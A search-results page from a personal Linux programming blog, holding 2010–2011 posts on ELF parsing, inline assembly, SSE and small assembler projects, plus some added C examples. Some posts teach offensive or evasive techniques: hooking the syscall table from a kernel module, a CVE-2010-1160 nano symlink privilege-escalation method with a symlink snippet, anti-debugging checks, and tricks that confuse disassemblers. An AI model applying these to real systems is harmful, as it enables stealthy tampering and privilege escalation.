www.main.lv
Don't think just code it

Search results for 'int80h'

2011-12-15 List ELF section names

Every ELF (Executable Linux Format) file has a standard structure.
Sections carry names that identify what each section is for.

Here is an example of how to print the names of all ELF sections.

These are the steps we take:
1. Find the section-name string table section
2. Read all section names from the string table section
3. Walk through all sections and print their names

First of all we need to read the ELF header (Elf32_Ehdr) from offset 0.
The ELF header holds the file offset of the section header table (Elf32_Ehdr.e_shoff).

The string table section has attributes that help us recognize it:
1. its address in memory (Elf32_Shdr.sh_addr) is 0
2. its type (Elf32_Shdr.sh_type) is SHT_STRTAB = 3
3. it is the first section with these attributes

To walk through all sections we use a for loop. The number
of sections comes from Elf32_Ehdr.e_shnum.
We iterate over all sections and check each one against the three
string table rules.

for ( iter_s=0; iter_s < ELFheader.e_shnum; iter_s++ )
{
	fseek( f, ELFheader.e_shoff+(ELFheader.e_shentsize*iter_s), SEEK_SET);
	fread( &STRheader, ELFheader.e_shentsize, 1, f );
	if ((STRheader.sh_type == SHT_STRTAB) &&
		(STRheader.sh_addr == 0x00000000))
	{
		//some code
		break; //found the string table section, leave the for loop
	}
}


The string table section holds all section names as NUL-terminated strings.
A section's name is given by Elf32_Shdr.sh_name, the offset of the name's first character inside the string table.

We read the whole string table into a buffer:

fseek( f, STRheader.sh_offset, SEEK_SET);
fread( STR_buffer, STRheader.sh_size, 1, f);


Now we can print a section's name with:

printf("%s\n", STR_buffer+ITERheader.sh_name);


This is example code for pulling some information out of an ELF file. There is a lot of other
information that can be extracted from an ELF file.

2011-10-30 C inline assembler

For a long time I have wanted to learn the "creepy" gcc inline assembly.
Looking at the manuals it is not so hard or "creepy". Using it is quite
interesting, and the disassembly of the compiled code looks very nice.

volatile keeps our asm code where it is and stops the compiler from optimizing
it away; without volatile the compiler may optimize it.

What to write in the __asm__ directive looks like this:

__asm__ __volatile__("our_code":output:input:clobbered)


As the code to convert to inline asm we will use the one from the last post [2].

There is only one instruction that we use, and its usage was:

get_timer:
	rdtsc
	ret


It is not very optimal, and writing a whole function for one instruction
is not beautiful. We remember that the return value of this function is
kept in the eax register.

__asm__ __volatile__("rdtsc":"=a"(x)::)


the code looks like this. But we can also make it a macro:

#define get_timer(X) __asm__ __volatile__("rdtsc":"=a"(X)::)


This code works fine and gives 70058 ticks per cycle.
When adding the option -O2 the result becomes very strange.

As we remember, rdtsc returns its result in edx:eax, so we add %edx to the
used registers (clobber list):

#define get_timer(X) __asm__ __volatile__("rdtsc":"=a"(X)::"%edx")


We can also rewrite everything as an inline function:

static inline unsigned int get_timeri()
{
	unsigned int i;
	__asm__ __volatile__("rdtsc":"=a"(i)::"%edx"); //edx is clobbered here too, as in the macro
	return i;
}


Now both functions work fine with -O options.
When the empty loop is optimized, it becomes empty and the resulting
tick count is 32 for both the inline function and the macro.
It no longer serves its main purpose. With no optimization switched on,
get_timer runs some ticks faster than get_timeri.

We can add the always_inline attribute and win some ticks;
the function will then always be inlined regardless of the optimization level:

static inline __attribute__((always_inline)) unsigned int get_timeri()


To fix the test loop for our measurement we build it as a separate object file,
compiled without optimization options:

void fixed_cycle()
{
	int i;
	for (i=0;i<10000;i++)
	{
	}
}


Now everything looks quite good and the inline assembly also works as expected.

For reference about inline asm see [1].
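
As an added example (not the post's code), here is the same rdtsc read in C with both halves of edx:eax declared as outputs, which is the other way to tell the compiler that edx changes, plus a loop measurement that survives -O2 because its counter is volatile. The read is guarded so the file still compiles on non-x86 targets; the "memory" clobber and all function names are mine.

```c
#include <stdint.h>
#include <stdio.h>

#if defined(__i386__) || defined(__x86_64__)
#define HAVE_RDTSC 1
/* rdtsc writes edx:eax. "=a" and "=d" bind both halves as outputs, so the compiler
 * knows both registers change and neither has to be listed as a clobber (the post's
 * alternative is to keep only "=a" and add "%edx" to the clobber list). volatile keeps
 * the read where it is written; the "memory" clobber (my addition) stops the compiler
 * from moving loads and stores across it. */
static inline uint64_t read_tsc(void)
{
    uint32_t lo, hi;
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi) : : "memory");
    return ((uint64_t)hi << 32) | lo;
}
#else
#define HAVE_RDTSC 0
static inline uint64_t read_tsc(void) { return 0; }   /* no TSC on this architecture */
#endif

int tsc_available(void) { return HAVE_RDTSC; }

/* Ticks spent in a counting loop. The counter is volatile, so -O2 cannot delete the
 * loop the way it emptied the post's test cycle (the constant 32 ticks). */
uint64_t measure_loop(unsigned iterations)
{
    volatile unsigned i;
    uint64_t start = read_tsc();
    for (i = 0; i < iterations; i++)
        ;
    return read_tsc() - start;
}

/* Sanity check for the wrapper: back-to-back reads must never go backwards. */
int tsc_monotonic(int rounds)
{
    uint64_t prev = read_tsc();
    for (int r = 0; r < rounds; r++) {
        uint64_t now = read_tsc();
        if (now < prev)
            return 0;
        prev = now;
    }
    return 1;
}

int main(void)
{
    if (!tsc_available()) {
        puts("no rdtsc on this architecture");
        return 0;
    }
    printf("10000 empty iterations: %llu ticks\n", (unsigned long long)measure_loop(10000));
    printf("monotonic over 1000 reads: %s\n", tsc_monotonic(1000) ? "yes" : "no");
    return 0;
}
```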


Links
[1]http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
[2]http://main.lv/post/linux-antidebug-5

2011-04-21 Hooking interrupt descriptor table

Hook interrupt descriptor table

Hooking the interrupt table is a very interesting thing:
with it you can disallow some operations or watch what is
happening in the system. This article is more of a review; a more technical
description is in link 1.

The first thing that we should know is that it will be done through a kernel module.
There are 2 commands for loading and unloading modules:

insmod

and

rmmod

There is a way to check system call addresses and the position of the syscall
table:

grep sys_call_table /proc/kallsyms
grep system_call /proc/kallsyms

We can also use it to find our module's functions and syscall addresses:
grep sys_write /proc/kallsyms
or, if we want to check our module's functions:
grep hook_idt /proc/kallsyms

We will now try to hook sys_mkdir. I usually use some minimalistic window managers, but some browsers and other GUI-ish programs like directories such as "Download" or "Desktop". All my directories in ~/ are lowercase, and I really hate the annoying "Download" and "Desktop" directories that are created without my permission; for my lowercase /home directory style they are ugly. With this hook they will be denied from doing such a thing. Our kernel module consists of these functions:

static int __init hook_init(void) //stuff on module init, idt hooking
static void __exit hook_exit(void) //stuff on module exit, restore idt table

asmlinkage long hooked_mkdir(const char *filename, mode_t mode) //our hook function

//how these functions work you can find in link number 1
void *get_writable_sct(void *sct_addr)
void *get_syscall_table(void)
The basic hooked function is:
asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
{
	return real_mkdir(filename, mode); //pass straight through to the original sys_mkdir
}
But now we need to add a check for "Desktop" and "Download". First we need an error code that will be returned when someone wants to create a forbidden directory; we will use EACCES. Here is the modified function for our task:
//hook for the mkdir syscall
asmlinkage long hooked_mkdir(const char *filename, mode_t mode)
{
	//deny directories named exactly "Desktop" or "Download"
	if (((strncmp(filename,"Desktop",7) == 0) && (strlen(filename) == 7)) ||
		((strncmp(filename,"Download",8) == 0) && (strlen(filename) == 8)))
	{
		printk(KERN_INFO "Mkdir hook\n");
		return -EACCES; //kernel convention: a syscall reports failure as a negative errno
	}
	return real_mkdir(filename, mode);
}
For module compiling: make
This was tested with kernel version 2.6.38.
Links:
[1] http://codenull.net/articles/kmh_en.html
[2] http://www.gadgetweb.de/linux/40-how-to-hijacking-the-syscall-table-on-latest-26x-kernel-systems.html

2011-02-25 Linux Assembler SSE add

SSE programming is very interesting from the point of view that 4 numbers are processed in parallel. SSE has registers of 128 bits; they can hold 4 floats. In GCC C there is no default type for 128 bits, so we define our own structure for that:

typedef struct xmm
{
    float a;
    float b;
    float c;
    float d;
} xmm __attribute__ ((aligned (16)));
The structure is aligned for performance. To add a 4-float value to another 4-float value we need to load the values:
movaps xmm0, [eax]
movaps xmm1, [ebx]
and add them:
addps xmm0,xmm1
after that, store the result somewhere:
movaps [eax], xmm0
The final test program in C looks like this:
#include <stdio.h>

typedef struct xmm
{
    float a;
    float b;
    float c;
    float d;
} xmm __attribute__ ((aligned (16)));

extern void sse_add( xmm *, xmm * );

int main( int argc, char **argv)
{
    xmm x0,x1;
    x0.a = 1.0;
    x0.b = 2.0;
    x0.c = 3.0;
    x0.d = 4.0;
    x1.a = x1.b = x1.c = x1.d = 5.0;
    
    printf("%10f %10f %10f %10f\n",x0.a,x0.b,x0.c,x0.d);
    printf("%10f %10f %10f %10f\n",x1.a,x1.b,x1.c,x1.d);
    
    sse_add( &x0 , &x1 ); /* x0 = x0 + x1, done in the asm routine */
    
    printf("%10f %10f %10f %10f\n",x0.a,x0.b,x0.c,x0.d);
    printf("%10f %10f %10f %10f\n",x1.a,x1.b,x1.c,x1.d);
    
    return 0;
}
gcc main.c add.o -o main

And the asm example:
format ELF

section '.text'

public sse_add

align 4
sse_add:
    ;arguments that are pointers for 2 xmm data blocks
    x0 equ [ebp+8]
    x1 equ [ebp+12]
    
    push ebp
    mov ebp, esp
    push ebx            ;ebx is callee-saved in cdecl, so preserve it for the caller
    
    mov eax, x0
    mov ebx, x1
    
    ;load the values into xmm0 and xmm1
    ;if the values were not aligned we would use movups instead of movaps
    movaps xmm0, [eax]
    movaps xmm1, [ebx]
    
    ;sum up and keep the result in xmm0
    addps xmm0,xmm1
    
    ;store the result in the first argument
    movaps [eax], xmm0
    
    pop ebx
    pop ebp
    ret
fasm add.asm add.o
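
As an added example (not the post's code), here is the same addition done with GCC's SSE intrinsics in C, choosing the aligned load (movaps, _mm_load_ps) or the unaligned one (movups, _mm_loadu_ps) by checking the pointer at run time, with a deliberately misaligned case next to the post's (1,2,3,4)+(5,5,5,5) values. The function names and the scalar fallback for non-SSE targets are mine.

```c
#include <stdint.h>
#include <stdio.h>
#if defined(__SSE__)
#include <xmmintrin.h>
#endif

typedef struct xmm { float a, b, c, d; } xmm __attribute__((aligned(16)));

/* 1 if p may be used with movaps / _mm_load_ps, i.e. it is 16-byte aligned. */
int is_xmm_aligned(const void *p) { return ((uintptr_t)p & 15u) == 0; }

/* dst = dst + src, lane by lane, for any float[4], aligned or not. */
void sse_add4(float *dst, const float *src)
{
#if defined(__SSE__)
    __m128 x0, x1;
    if (is_xmm_aligned(dst) && is_xmm_aligned(src)) {
        x0 = _mm_load_ps(dst);            /* movaps: faults on a misaligned address */
        x1 = _mm_load_ps(src);
        _mm_store_ps(dst, _mm_add_ps(x0, x1));
    } else {
        x0 = _mm_loadu_ps(dst);           /* movups: accepts any alignment */
        x1 = _mm_loadu_ps(src);
        _mm_storeu_ps(dst, _mm_add_ps(x0, x1));
    }
#else
    for (int i = 0; i < 4; i++)           /* scalar fallback for non-SSE targets */
        dst[i] += src[i];
#endif
}

/* The post's values: (1,2,3,4) + (5,5,5,5) on aligned structs; 1 when every lane is right. */
int check_aligned_add(void)
{
    xmm x0 = {1.0f, 2.0f, 3.0f, 4.0f}, x1 = {5.0f, 5.0f, 5.0f, 5.0f};
    if (!is_xmm_aligned(&x0) || !is_xmm_aligned(&x1))
        return 0;
    sse_add4((float *)&x0, (const float *)&x1);
    return x0.a == 6.0f && x0.b == 7.0f && x0.c == 8.0f && x0.d == 9.0f;
}

/* Deliberately misaligned operands: float[4] placed 4 bytes into a 16-byte aligned
 * buffer. movaps would fault here; the unaligned path must still give the same sums. */
int check_unaligned_add(void)
{
    float buf0[8] __attribute__((aligned(16))) = {0, 1, 2, 3, 4, 0, 0, 0};
    float buf1[8] __attribute__((aligned(16))) = {0, 5, 5, 5, 5, 0, 0, 0};
    float *p0 = buf0 + 1, *p1 = buf1 + 1;       /* offset 4: not 16-byte aligned */
    if (is_xmm_aligned(p0))
        return 0;
    sse_add4(p0, p1);
    return p0[0] == 6.0f && p0[1] == 7.0f && p0[2] == 8.0f && p0[3] == 9.0f;
}

int main(void)
{
    printf("aligned add ok: %d\n", check_aligned_add());
    printf("unaligned add ok: %d\n", check_unaligned_add());
    return 0;
}
```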

2011-01-22 Linux assembler scripting language

This is a small interpreter in asm.
It works with a small language that can do simple things.
All that you need to know about the language
is these symbols: "ABCDI$@"

ABCD are used with a parameter.
I takes no parameter.
$ and @ are parameters.


ABCD - is like the assembler command mov, where the symbol is the register name:
A0 is mov eax, 0
B9 is mov ebx, 9
Only a single-character number is supported. The character after ABCD is supposed to be in the range 0...9, but you can use any other symbol except @ or $. Look inside the ASCII table: char '0' is the value 0 and the others follow relative to it; the number '~' is '~'-'0'=127-48=79.

I - is interrupt number 80h

$@ - are variables from the stack
@ - uses the current variable from the stack and moves the stack pointer to the next stack value
$ - uses the current stack value and doesn't change the stack pointer position

That's all.

Now we can make our first script and run it.

There are 2 things that you should know. The script is converted to assembler commands and copied to a memory position.

Every file has its own purpose and they are all separated for ease of use:

'script.inc' your script goes inside it
'stack_table.inc' configures the stack for use
'variables.inc' defines variables
'exec.inc' memory region where the interpreted script commands will be copied

Example 1:
Now the first example script:

script db 'A1B0I'

which is
mov eax, 1 ;syscall number, look it up in <asm/unistd.h> or at http://bluemaster.iu.hio.no/edu/dark/lin-asm/syscalls.html
mov ebx, 0
int 80h

It is the exit command. The stack can be empty.
Example 2:
Now we can make hello_world.

script db 'A4B1C@D@IA1B0I'

It is:
mov eax, 4
mov ebx, 1
mov ecx, buffer_msg; stack value 0
mov edx, buffer_len; stack value 1
int 80h

mov eax, 1
mov ebx, 0
int 80h
in C it would be:
write(1,buffer_msg,buffer_len)
exit(0);
Here is an example of how asm corresponds to C code: http://www.main.lv/posts/view/linux-assembler-open-file. The stack used is in 'stack_table.inc':
stack_table:
	dd buffer_msg ;variable 0
	dd buffer_len ;variable 1
and in 'variables.inc' we define these variables:
buffer_msg db "Hello world",10	;with newline
buffer_len = $-buffer_msg	;using fasm mega feature to detect size
We can count the equivalent asm commands: there are 8 of them, which means adding 8 lines to 'exec.inc':
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90
	db 0x90,0x90,0x90,0x90,0x90

Type make and everything works =]. WooHoo, a small interpreted language is made and it fits in 417 bytes.
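As an added example (not the post's code), here is the translation the interpreter performs, written in C as a plain encoder: it turns a script such as 'A4B1C@D@IA1B0I' into the x86 bytes that would fill exec.inc (mov r32, imm32 is 0xB8 plus the register number followed by a little-endian imm32; int 80h is CD 80) and refuses a script that runs out of stack values, exec space, or a parameter. The stack-table values are a constructed sample and the message address 0x08049000 is assumed; nothing here executes the bytes.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

/* opcode of "mov r32, imm32" is 0xB8 + register number: eax=0, ecx=1, edx=2, ebx=3 */
static int reg_opcode(char c)
{
    switch (c) {
    case 'A': return 0xB8;   /* mov eax, imm32 */
    case 'B': return 0xBB;   /* mov ebx, imm32 */
    case 'C': return 0xB9;   /* mov ecx, imm32 */
    case 'D': return 0xBA;   /* mov edx, imm32 */
    default:  return -1;
    }
}

/* Encode script into out[]. stack[] supplies the values for '$' and '@' operands.
 * Returns the number of bytes written, or 0 on a malformed script or overflow. */
size_t script_assemble(const char *script, const uint32_t *stack, size_t nstack,
                       uint8_t *out, size_t outcap)
{
    size_t pos = 0, sp = 0;
    for (const char *p = script; *p; p++) {
        if (*p == 'I') {                         /* int 80h */
            if (pos + 2 > outcap) return 0;
            out[pos++] = 0xCD; out[pos++] = 0x80;
            continue;
        }
        int op = reg_opcode(*p);
        if (op < 0) return 0;                    /* not one of A B C D I */
        char arg = *++p;
        uint32_t imm;
        if (arg == '\0') return 0;               /* register letter without a parameter */
        if (arg == '$' || arg == '@') {          /* take the current stack value ... */
            if (sp >= nstack) return 0;          /* ... but only if one is left */
            imm = stack[sp];
            if (arg == '@') sp++;                /* '@' advances to the next stack value */
        } else {
            imm = (uint32_t)(arg - '0');         /* '0'..'9' -> 0..9, other chars relative to '0' */
        }
        if (pos + 5 > outcap) return 0;          /* exec.inc area too small */
        out[pos++] = (uint8_t)op;                /* little-endian imm32 follows the opcode */
        out[pos++] = imm & 0xFF;         out[pos++] = (imm >> 8) & 0xFF;
        out[pos++] = (imm >> 16) & 0xFF; out[pos++] = (imm >> 24) & 0xFF;
    }
    return pos;
}

/* Constructed sample matching Example 2: stack value 0 is the message address (an assumed
 * load address), stack value 1 is its length ("Hello world" plus newline = 12). */
static const uint32_t sample_stack[2] = { 0x08049000u, 12u };

size_t assemble_hello(uint8_t *out, size_t outcap)
{
    return script_assemble("A4B1C@D@IA1B0I", sample_stack, 2, out, outcap);
}

/* Convenience for checks: size of the assembled hello script, and its i-th byte (-1 past the end). */
int hello_size(void) { uint8_t code[64]; return (int)assemble_hello(code, sizeof code); }
int hello_byte(size_t i)
{
    uint8_t code[64];
    size_t n = assemble_hello(code, sizeof code);
    return i < n ? code[i] : -1;
}

int main(void)
{
    uint8_t code[64];
    size_t n = assemble_hello(code, sizeof code);
    printf("%zu bytes:", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", code[i]);
    printf("\n");
    return 0;
}
```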

2010-09-16 ELF rewrite function

The main idea was to replace a compiled-in function with some other code and run it. By default this is not possible. If you try to write some bytes into the function's location with memcpy(), a segfault happens. Why? A program has different segments and they are used for different purposes. Our code belongs to the read-only executable segment, in the '.text' section. We can see it with:

readelf -S main -l

In the previous post there was a program that can be used to make a segment writable. After running

./textwriteble main

the segment with the '.text' section becomes writable. When we try to use memcpy() there is no segfault now. The second thing is how to make our replacement function position independent with respect to the data inside it. First of all we should know our current position. It is in the eip register. push eip? mov eax, eip? It doesn't work. When we use call, the return address is saved on the stack. Now with this small function it can be saved in some location:

get_ip:
    mov ecx, [esp]
    ret
At this moment we have converted the segment to writable and have written a position detection function. If there is data that will be used in the replacement function then we also need to detect the position of that data. For example we will use:
mov eax, sys_call ;we will use SYS_WRITE = 5
mov ebx, output_id ; output on terminal is STDOUT 1
mov ecx, pointer_to_msg
mov edx, size_of_msg
int 80h
If this were an ordinary situation then we would define:
msg db "Hello",10
msg_size = $-msg
and our code becomes:
mov eax, SYS_WRITE
mov ebx, STDOUT
mov ecx, msg
mov edx, msg_size
int 80h
But how do we know the position of msg if we don't know where the function will be placed? Use the function get_ip and you will know the current instruction position. It will be the next instruction after

call get_ip

Our code becomes:
call get_ip    ;calling and detecting eip
saved_ip:      ;position that will be saved
jmp get_ip_end ;jump over function
get_ip:
    mov ecx, [esp] ;save return eip
    ret
get_ip_end:
mov eax, SYS_WRITE   
mov ebx, STDOUT
add ecx, msg-saved_ip  ;offset of msg
mov edx, msg_size
int 80h
ECX now holds a position independent pointer to our text. For testing purposes the function fun() is filled with

asm(".byte 0x90, ... ,0x90");

hex 0x90 translates to the nop instruction. nop is the No OPeration instruction, and so the function does nothing. Function fun() contains:
push ebp
mov ebp, esp
start_overwrite_here:
nop
...
...
...
nop
pop ebp
ret
The nop instructions can be replaced with any binary code. There should be enough nop instructions for our binary code. There is no check on the function size, so overwriting can cause problems if the binary code is larger than the function. Start overwriting the function at position (&fun+3) with memcpy().
Voilà, after enabling the segment the function can be overwritten. Here we used our previous experience and have a mega trick for function replacement.
Compile:
make


Linkage:
[1] http://www.unixwiz.net/techtips/win32-callconv-asm.html
[2] http://www.programmersheaven.com/mb/x86_asm/357735/357735/get-the-value-of-eip/
[3] http://toku.es/2010/06/text-writable/
[4] http://main.lv/posts/view/elf-text-section
[5] http://main.lv/posts/view/linux-assembler-hello-world

2010-04-24 CVE 2010-1160 Exploiting nano

CVE-2010-1160 Nano Changed File Symlink Privilege Escalation

Usually if I have to edit some file I use the nano editor. It is on almost every distribution and is easy and fast to use. Some time ago I hated vim because of Ctrl-D =] and so used nano or pico. Now I know how to exit from vim: :q!. After this bug was reported in CVE I was excited to check it out in real life. It is the first bug that I have fully tested. This bug is fixed in the newest versions. Testing all nano versions, this bug works on versions < 2.1.7; my system now has the latest nano version, and I have compiled many < 2.1.7 versions to test this bug. To get your nano version run:

$ nano -V

When a user is editing a file, nano doesn't check whether it is being edited by someone else. When saving the file it simply saves it and doesn't check whether it was modified. If the file was changed by someone else then nano will overwrite it with its text. But it can also be replaced by a symlink that points to another file. How to use it in real life:

1) Open file with nano
2) Change file or set symlink
3) Make changes in file and save file in nano
4) See result in symlinked file

Everything looks like:

$ nano text.txt

Now someone does:

$ ln -s empty.txt text.txt

Nano saves what you save into text.txt. In Python it looks like:

import os

os.remove( "text.txt" )
open( "empty.txt" , "w" ).close()
os.symlink( "empty.txt" , "text.txt" )



If you are root and open a file whose owner isn't you, then the owner, while you are editing his file, can set a symlink to some "/etc/important.conf" and you will overwrite it with some other unrelated content. This can do some harm to your system. How can it be exploited in real life by a "small unprivileged user"? Make some interesting file that root will be interested in. Make some process that watches the nanos running in the system.
If the file nano opened is ours, symlink it.

1) Detect running nano in the system
2) Check which file is opened
3) If the file is yours, make the symlink

The script is only for a normal user and doesn't work if you try to symlink a file opened by root's nano. It makes all the steps described above. Change the script variables for your tests:
debug = True
nano = "nano-2.0.9"
user = "user"
sym_path="/home/user/empty.txt"

Tested only with Python 2.6.5

Simply stay up to date, or if you use an old nano, don't open an unprivileged user's files as a privileged user. That will save you from this bug.
Linkage:
[1] http://osvdb.org/show/osvdb/63872
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1160
[3] http://drosenbe.blogspot.com/2010/03/nano-as-root.html
[4] http://svn.savannah.gnu.org/viewvc/trunk/nano/ChangeLog?revision=4503&root=nano&view=markup

2010-03-05 Linux antidebug 3

Now we will try to make the disassembler output very unclear. We make the jump through the eax register.
Program 1

main:
	push lbl+1
	pop eax
	jmp eax	
lbl:
	db 0xe8
	mov eax, 4
	mov ebx, 1
	mov ecx, msg1
	mov edx, msg1_size
	int 80h
	
	mov eax, 1
	mov ebx, 0
	int 80h
The output is the same as the source. Nothing changes.
Disassembler output 1
? ....... ! main:                           ;xref o80482d7     
? ....... !   push        offset_804837d                  
? 8048379 !   pop         eax                        
? 804837a !   jmp         eax                         
? 804837c     db          0e8h                            
? 804837d !                                                   
? ....... ! offset_804837d:                 ;xref o8048374 
? ....... !   mov         eax, 4                       
? 8048382 !   mov         ebx, 1                   
? 8048387 !   mov         ecx, strz_I_am_running__8049568  
? 804838c !   mov         edx, 0eh           
? 8048391 !   int         80h              
? 8048393 !   mov         eax, 1             
? 8048398 !   mov         ebx, 0 
? 804839d !   int         80h 


Here we add only one instruction. We take the jump address and add 1. The disassembler cannot calculate the address of the jmp.
Program 2
As in the first program, the disassembler thinks that we push the correct address and disassembles from there. Our byte 0xe9 is consumed in the disassembler output. That's nice.
main:
	push lbl
	pop eax
	inc eax
	jmp eax
lbl:
	db 0xe9
	mov eax, 4
	mov ebx, 1
	mov ecx, msg1
	mov edx, msg1_size
	int 80h
	
	mov eax, 1
	mov ebx, 0
	int 80h

Disassembler output 2
? ....... ! main:                           ;xref o80482d7  
? ....... !   push        offset_804837d 
? 8048379 !   pop         eax            
? 804837a !   inc         eax     
? 804837b !   jmp         eax   
? 804837d !                      
? ....... ! offset_804837d:                 ;xref o8048374 
? ....... !   jmp         804883ah        
? 8048382     add         [ebx+1], bh     
? 8048388     mov         ecx, 8049568h   
? 804838d     mov         edx, 0eh  
? 8048392     int         80h     
? 8048394     mov         eax, 1  
? 8048399     mov         ebx, 0 
? 804839e     int         80h 
Now we add a nop instruction after every line of our code. It doesn't have any impact on how the program works.
Program 3
main:
	push lbl
	pop eax
	inc eax
	jmp eax
lbl:
	db 0xe9
	mov eax, 4
	nop 
	mov ebx, 1
	nop
	mov ecx, msg1
	nop
	mov edx, msg1_size
	int 80h
	
	mov eax, 1
	mov ebx, 0
	jmp lbl2+1
lbl2:
	db 0xe9
	int 80h

The disassembler output is now very nice. The output isn't very good: the first time you view it, it is very unclear what exactly is done by this code.
Disassembler output 3
? ....... ! main:                           ;xref o80482d7
? ....... !   push        offset_804837d  
? 8048379 !   pop         eax   
? 804837a !   inc         eax     
? 804837b !   jmp         eax  
? 804837d !               
? ....... ! offset_804837d:                 ;xref o8048374 
? ....... !   jmp         804883ah   
? 8048382     add         [eax+1bbh], dl
? 8048388     add         [eax+49578b9h], dl  
? 804838e     or          [eax+0ebah], dl     
? 8048394     add         ch, cl               
? 8048396     cmp         byte ptr [eax+1], 0bbh  
? 804839d     add         [eax], al   
? 804839f     add         [eax], al  
? 80483a1     jmp         80483a4h
? 80483a3     jmp         98950475h  

Here is one more way to make an unclear jump to another place. We use a function, and inside the function we change the return address by 1.

Program 4
That also works fine. The disassembler doesn't know the real return address and consumes 0xe8 as it thinks best.
main:
	call fun
	db 0xe8
	mov eax, 4
	mov ebx, 1
	mov ecx, msg1
	mov edx, msg1_size
	int 80h
	
	mov eax, 1
	mov ebx, 0
	int 80h
	
fun:
	pop ebp
	inc ebp
	push ebp
	ret

Disassembler output 4
? ....... ! main:                           ;xref o80482d7 
? ....... !   call        sub_804839c   
? 8048379 !   call        8048836h  
? 804837e !   add         [ebx+1], bh      
? 8048384 !   mov         ecx, strz_I_am_running__8049568
? 8048389 !   mov         edx, 0eh
? 804838e !   int         80h 
? 8048390 !   mov         eax, 1 
? 8048395 !   mov         ebx, 0
? 804839a !   int         80h 
? 804839c !                       
? ....... ! ;-----------------------     
? ....... ! ;  S U B R O U T I N E   
? ....... ! ;----------------------- 
? ....... ! sub_804839c:                    ;xref c8048374  
? ....... !   pop         ebp     
? 804839d !   inc         ebp     
? 804839e !   push        ebp 
? 804839f !   ret  



2010-02-26 Linux antidebug 2

This is a dirty solution: it checks the program's argv[0] against a name you define. When running under a debugger such as gdb or ald the name is changed to the full path, while the user-typed name from the terminal is './main'.

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

int main( int argc , char **argv )
{
	pid_t pid;
	FILE *f;
	char str[128];
	char spid[10];
	
	//write our own pid to a file and read it back as a string
	f = fopen( "pid.txt" , "w" );
	pid = getpid();
	fprintf(f,"%d ",pid);
	fclose( f );
	f = fopen( "pid.txt" , "r" );
	fscanf( f , "%s" , spid );
	fclose( f );
	
	//print /proc/<pid>/cmdline: under a debugger argv[0] is the full path
	strcpy( str , "cat /proc/" );
	strcat( str , &spid[0] );
	strcat( str , "/cmdline");
	printf( "[%s]\n", spid );
	system( str );
	
	printf("\n");
	return 0;
}
The dirty function that puts the dirty solution in one place:
int badppid( const char *real_name )
{
	pid_t pid;
	FILE *f;
	char str[128];
	char spid[10];
	
	f = fopen( "pid.txt" , "w" );
	pid = getpid();
	fprintf(f,"%d ",pid);
	fclose( f );
	
	f = fopen( "pid.txt" , "r" );
	fscanf( f , "%s" , spid );
	fclose( f );
	
	strcpy( str , "cat /proc/" );
	strcat( str , &spid[0] );
	strcat( str , "/cmdline > name.txt");
	system( str );
	
	f = fopen( "name.txt" , "r" );
	fscanf( f , "%s" , str );
	fclose( f );
	if ( strncmp(str,real_name,strlen(real_name)) != 0 )
	{
		return -1;	//cmdline does not start with the expected name
	}
	
	return 0;
}

2010-02-23 Linux antidebug 1

When ptrace is used for program debugging, only one tracer can be attached to a program; when we try to run ptrace with PTRACE_TRACEME ourselves we get -1. I tested with gdb and ald. This method should also work with IDA Pro.

#include <stdlib.h>
#include <stdio.h>
#include <sys/ptrace.h>

long int ptraced()
{
	return (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1);
}

int main()
{
	if ( ptraced() )
	{
		printf("Ptraced!\n");
	}
	return 0;
}



2010-01-24 Linux Local Descriptor Table

If the 0x80**** addresses are the default, nope: you can set up your own. The compiler will not see them, but you can do it. Set up an LDT and you will see it.

use32
mov dword [0] ,"Hall"
mov dword [4] ,"Ball"
mov dword [8] ,"Mall"
mov dword [12],0x00000000
Yes, everything starts from 0x0:
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <asm/ldt.h>

char new_segment[16];

int main()
{
	int r;
	
	struct user_desc *ldt;
	
	ldt = (struct user_desc*)malloc(sizeof(struct user_desc));
	
	ldt->entry_number = 0;
	ldt->base_addr = ((unsigned long)&new_segment);
	ldt->limit = 16;
	ldt->seg_32bit = 0x1;
	ldt->contents = 0x0;
	ldt->read_exec_only = 0x0;
	ldt->limit_in_pages = 0x0;
	ldt->seg_not_present = 0x0;
	ldt->useable = 0x1;
	
	printf("Start\n");
	r = syscall( __NR_modify_ldt, 1 , ldt , sizeof(struct user_desc) );
	if ( r == -1 )
	{
		printf("Sorry\n");
		exit( 0 );
	}
	asm("pushl %ds");
	asm("movl $0x7, %eax"); /* 0111: 0-Index 1-Using the LDT table 11-RPL of 3 */
	asm("movl %eax, %ds");	
	asm(".byte 0xc7,0x5,0x0,0x0,0x0,0x0,0x48,0x61,0x6c,0x6c,0xc7,0x5,0x4,0x0,0x0,0x0,0x42,0x61,0x6c,0x6c,0xc7,0x5,0x8,0x0,0x0,0x0,0x4d,0x61,0x6c,0x6c,0xc7,0x5,0xc,0x0,0x0,0x0,0x0,0x0,0x0,0x0");
	asm("popl %ds");
	printf("End\n");
	
	printf("Segment [%s]\n",new_segment);
	
	free( ldt );
	
	return 0;
}


asm(".byte ... ") is the content of code.bin

Compile:
fasm code.asm code.bin
gcc main.c -o main


2010-01-21 Linux assembler and g++

format ELF

section '.text' executable

public eexit
eexit:
	mov	eax,1
	xor	ebx,ebx
	int	0x80
	ret


#include <cstdlib>
#include <cstdio>
#include <iostream>

extern "C" void eexit();

int main()
{
	eexit();
	std::cout << "Problem?\n";
	return 0;
}

Compile:
fasm hello.asm hello.o
g++ -c cmain.cpp -o cmain.o
g++ cmain.o hello.o -o cmain

2010-01-21 Linux assembler and gcc

format ELF

section '.text' executable

public eexit
eexit:
	mov	eax,1
	xor	ebx,ebx
	int	0x80
	ret



#include <stdlib.h>
#include <stdio.h>

extern void eexit();

int main()
{
	eexit();
	printf("Problem?\n");
	return 0;
}

Compile:

